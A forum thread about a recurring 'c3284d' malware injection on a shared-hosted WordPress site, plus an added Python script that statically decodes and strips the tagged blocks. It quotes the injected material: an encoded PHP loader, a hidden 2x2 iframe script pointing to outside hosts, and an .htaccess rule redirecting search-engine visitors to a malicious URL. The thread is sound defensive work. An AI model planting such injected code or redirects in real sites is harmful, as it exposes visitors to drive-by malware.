mon*_*y64 6 php iframe code-injection
For the past few days my website has repeatedly been the target of an iframe attack. The code is mainly appended to PHP and JavaScript pages. The code is then PHP base64 encoded, see the example (I changed the code slightly to neutralise it):
#c3284d#
echo(gzinflate(base64_decode("aJ1yhA3pkW4cWnUnmFluNmeq66wqE0OmVRcMUP3WQAupFZFGgaJvSE7IZH67z5S8 VwMxbWwg/TRkFvtPyCw9AGGzqRm8Qi/1LV6+9MdTtf9rtXb8e4L")));
#/c3284d#
Decoded, this looks like this:
<script type="text/javascript">
document.write(
'<iframe src="http://opticmoxie.com/xxxxxxx.php"
name="Twitter" scrolling="auto" frameborder="no"
align="center" height="2" width="2"></iframe>'
);
</script>
One common point is that all of the code carries the comment "#c3284d#", so tracing the malicious code is not hard. But it is time-consuming...
We are on a shared server at Gradwell (UK), and they have not been especially helpful. So the question is: what can I do to stop this problem from recurring? I know about MySQL injection attacks and use PHP's mysql_real_escape_string to guard against them.
The site is PHP and MySQL driven. We use MySQL and FTP and have a shell account for SSH access. We use WordPress (latest update, plugins deactivated).
I have the same problem. In my case the appended code is:
<!--c3284d--><script type="text/javascript">
document.write('<iframe src="http://poseyhumane.org/stats.php" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>');
</script><!--/c3284d-->
In addition, there was also a .htaccess file, as follows:
#c3284d#
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(abacho|abizdirectory|about|acoon|alexana|allesklar|allpages|allthesites|alltheuk|alltheweb|altavista|america|amfibi|aol|apollo7|aport|arcor|ask|atsearch|baidu|bellnet|bestireland|bhanvad|bing|blog|bluewin|botw|brainysearch|bricabrac|browseireland|chapu|claymont|click4choice|clickey|clickz|clush|confex|cyber-content|daffodil|devaro|dmoz|dogpile|ebay|ehow|eniro|entireweb|euroseek|exalead|excite|express|facebook|fastbot|filesearch|findelio|findhow|finditireland|findloo|findwhat|finnalle|finnfirma|fireball|flemiro|flickr|freenet|friendsreunited|galaxy|gasta|gigablast|gimpsy|globalsearchdirectory|goo|google|goto|gulesider|hispavista|hotbot|hotfrog|icq|iesearch|ilse|infoseek|ireland-information|ixquick|jaan|jayde|jobrapido|kataweb|keyweb|kingdomseek|klammeraffe|km|kobala|kompass|kpnvandaag|kvasir|libero|limier|linkedin|live|liveinternet|lookle|lycos|mail|mamma|metabot|metacrawler|metaeureka|mojeek|msn|myspace|netscape|netzindex|nigma|nlsearch|nol9|oekoportal|openstat|orange|passagen|pocketflier|qp|qq|rambler|rtl|savio|schnellsuche|search|search-belgium|searchers|searchspot|sfr|sharelook|simplyhired|slider|sol|splut|spray|startpagina|startsiden|sucharchiv|suchbiene|suchbot|suchknecht|suchmaschine|suchnase|sympatico|telfort|telia|teoma|terra|the-arena|thisisouryear|thunderstone|tiscali|t-online|topseven|twitter|ukkey|uwe|verygoodsearch|vkontakte|voila|walhello|wanadoo|web|webalta|web-archiv|webcrawler|websuche|westaustraliaonline|wikipedia|wisenut|witch|wolong|ya|yahoo|yandex|yell|yippy|youtube|zoneru)\.(.*)
RewriteRule ^(.*)$ http://onestopchinasource.com/catalog/stats.php [R=301,L]
</IfModule>
#/c3284d#
I found two articles about this problem: http://www.webmasterworld.com/html/4472821.htm and http://stopmalvertising.com/malware-reports/the-c3284d-malware-network-stats.php.html
Hope this helps.
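The question says that hunting the "#c3284d#" blocks by hand is time-consuming, and the answer shows the three places the same tag turns up (a PHP loader, an HTML comment pair, and a .htaccess rewrite). The following script, an added example that is not code from either poster, does the hunt in one pass: it decodes the gzinflate(base64_decode(...)) loader statically (no eval, so nothing runs), reports the iframe target it would write, and strips every tagged block from a web root. Everything it scans is a constructed sample written to a temporary directory; the host names, file names and the `demo()` helper are assumptions for illustration.

```python
"""Added example (not from the original thread): find, decode and strip the
c3284d-tagged injections described above without executing any of them."""
import base64
import re
import tempfile
import zlib
from pathlib import Path

# Three marker forms seen in the thread: PHP comment, HTML comment, .htaccess comment.
MARKER_RE = re.compile(
    r"#c3284d#.*?#/c3284d#"                # PHP files and .htaccess
    r"|<!--c3284d-->.*?<!--/c3284d-->",    # HTML / JS injected as markup
    re.DOTALL,
)

# The PHP loader: echo(gzinflate(base64_decode("...")));
PAYLOAD_RE = re.compile(
    r'gzinflate\s*\(\s*base64_decode\s*\(\s*["\']([^"\']*)["\']\s*\)\s*\)'
)

# The decoded stage drops a hidden 2x2 iframe; pull its target out of the JS.
IFRAME_SRC_RE = re.compile(r'<iframe[^>]*\bsrc=["\']([^"\']+)["\']', re.IGNORECASE)


def decode_payload(b64: str) -> str:
    """Static equivalent of PHP gzinflate(base64_decode($s)): raw DEFLATE, no zlib header.
    Whitespace is stripped first because pasted blobs are often line-wrapped."""
    raw = base64.b64decode(re.sub(r"\s+", "", b64))
    return zlib.decompress(raw, -zlib.MAX_WBITS).decode("utf-8", "replace")


def encode_payload(text: str) -> str:
    """Inverse (PHP base64_encode(gzdeflate($s))); used here only to build a constructed sample."""
    c = zlib.compressobj(9, zlib.DEFLATED, -zlib.MAX_WBITS)
    return base64.b64encode(c.compress(text.encode()) + c.flush()).decode()


def iframe_targets(php_source: str) -> list[str]:
    """Decode every gzinflate/base64 loader in a PHP file and list the iframe URLs it writes."""
    targets: list[str] = []
    for blob in PAYLOAD_RE.findall(php_source):
        try:
            stage = decode_payload(blob)
        except (ValueError, zlib.error):
            continue  # neutralised or truncated blob, as in the question's sample
        targets.extend(IFRAME_SRC_RE.findall(stage))
    return targets


def strip_injection(text: str) -> tuple[str, int]:
    """Remove every marker-delimited block; returns (cleaned text, blocks removed)."""
    return MARKER_RE.subn("", text)


def scan_tree(root: Path, fix: bool = False) -> dict[str, int]:
    """Map relative path -> number of c3284d blocks found (and removed when fix=True)."""
    hits: dict[str, int] = {}
    for p in root.rglob("*"):
        if not p.is_file():
            continue
        if p.name != ".htaccess" and p.suffix.lower() not in (".php", ".js", ".html", ".htm"):
            continue
        text = p.read_text(encoding="utf-8", errors="replace")
        cleaned, n = strip_injection(text)
        if n:
            hits[str(p.relative_to(root))] = n
            if fix:
                p.write_text(cleaned, encoding="utf-8")
    return hits


def demo() -> dict:
    """Build a constructed mini web root (assumed layout) with the three injection forms, then clean it."""
    root = Path(tempfile.mkdtemp(prefix="c3284d_"))
    stage = (
        '<script type="text/javascript">document.write(\'<iframe src="http://example.invalid/stats.php" '
        'name="Twitter" height="2" width="2"></iframe>\');</script>'
    )
    php = (
        "<?php\n#c3284d#\n"
        f'echo(gzinflate(base64_decode("{encode_payload(stage)}")));\n'
        "#/c3284d#\necho \"hello\";\n"
    )
    html = "<html><body>page</body></html>\n<!--c3284d-->" + stage + "<!--/c3284d-->\n"
    htaccess = (
        "#c3284d#\n<IfModule mod_rewrite.c>\nRewriteEngine On\n"
        "RewriteCond %{HTTP_REFERER} ^.*(google|bing|yahoo)\\.(.*)\n"
        "RewriteRule ^(.*)$ http://example.invalid/catalog/stats.php [R=301,L]\n"
        "</IfModule>\n#/c3284d#\n"
    )
    (root / "index.php").write_text(php)
    (root / "about.html").write_text(html)
    (root / ".htaccess").write_text(htaccess)
    (root / "clean.js").write_text("console.log('fine');\n")

    before = scan_tree(root)            # report only
    targets = iframe_targets(php)       # what the loader would inject, decoded offline
    scan_tree(root, fix=True)           # strip the tagged blocks in place
    after = scan_tree(root)
    return {
        "before": before,
        "after": after,
        "targets": targets,
        "index_php": (root / "index.php").read_text(),
    }


if __name__ == "__main__":
    print(demo())
```

Two caveats worth keeping in mind. First, the .htaccess rule only fires when the Referer matches the search-engine and social-network list, so the site owner browsing the site directly will never see the redirect; a quick check from the shell account is `curl -sI -e 'https://www.google.com/' http://yoursite/` and looking for a 301 to the stats.php URL. Second, stripping the tagged blocks removes the symptom, not the cause: something with write access (stolen FTP or SSH credentials, a writable plugin or theme file, a neighbour on the shared host) put them there, and until that access is found and the credentials rotated the blocks will come back.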